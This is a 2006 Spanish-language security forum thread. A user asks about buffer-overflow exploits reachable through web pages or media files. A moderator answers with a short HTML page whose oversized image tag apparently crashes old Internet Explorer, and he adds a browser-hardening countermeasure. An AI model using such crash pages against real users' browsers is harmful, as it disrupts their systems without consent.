elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Buffer Overflow en una pagina web		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Buffer Overflow en una pagina web  (Leído 3,437 veces)
mordiskos

Desconectado Desconectado

Mensajes: 242



Ver Perfil
Buffer Overflow en una pagina web
« en: 8 Marzo 2006, 22:50 pm »
Me gustaria saber si existe algun exploit que provoque un buffer overflow, mediante la ejecucion de codigo PHP, HTML o javascript y que permita ejecutar codigo arbitrario en el sistema afectado.

Tambien me interesaria saber si existe algun fallo conocido que provoque un buffer overflow mediante la reproduccion de archivos MP4, MP3, JPEG, TIFF, WMA, PNG...

Salu2 y gracias.
En línea
ANELKAOS
Colaborador
***
Desconectado Desconectado

Mensajes: 3.105


#include<nda.h>


Ver Perfil WWW
Re: Buffer Overflow en una pagina web
« Respuesta #1 en: 9 Marzo 2006, 00:45 am »
Un desbordamiento sencillito para que pruebes con la configuración por defecto:

1. Crea un archivo html con este contenido
Código:
<HTML>
  <BODY>
    <IMG SRC="/ .ANELKAOS.jpg" width="9999999" height="9999999">
  </BODY>
</HTML>

2. Guarda mi avatar con el nombre ANELKAOS.jpg en la misma carpeta.

3. Abrelo con IE  :D

Contramedida rápida: Herramientas > Opciones de Inet > pestaña Seguridad > ajustar el nivel de seguridad de la zona Internet a Alta.

Respecto a los BoF...existir existen multitud, pero siempre dependen del navegador o reproductor que se use. Si no eres mas específico....no te puedo ayudar mas.
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema, return address buffer overflow (Cómo calcular la dirección del buffer?
Bugs y Exploits 		Debci 6 7,374 Último mensaje 7 Abril 2014, 20:00 pm
por soez
Aplicaciones vulnerables a buffer overflow
Bugs y Exploits 		giruzgz 3 4,193 Último mensaje 6 Junio 2017, 02:39 am
por sirdarckcat
Buffer Overflow
Bugs y Exploits 		vivianfes 0 1,989 Último mensaje 23 Abril 2019, 23:58 pm
por vivianfes
Buffer Overflow en web
Bugs y Exploits 		seus 3 3,799 Último mensaje 29 Enero 2020, 22:18 pm
por WHK
Explicación de buffer overflow
Bugs y Exploits 		Parado_larga_duracion_ESP 0 2,289 Último mensaje 23 Febrero 2024, 11:43 am
por Parado_larga_duracion_ESP
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines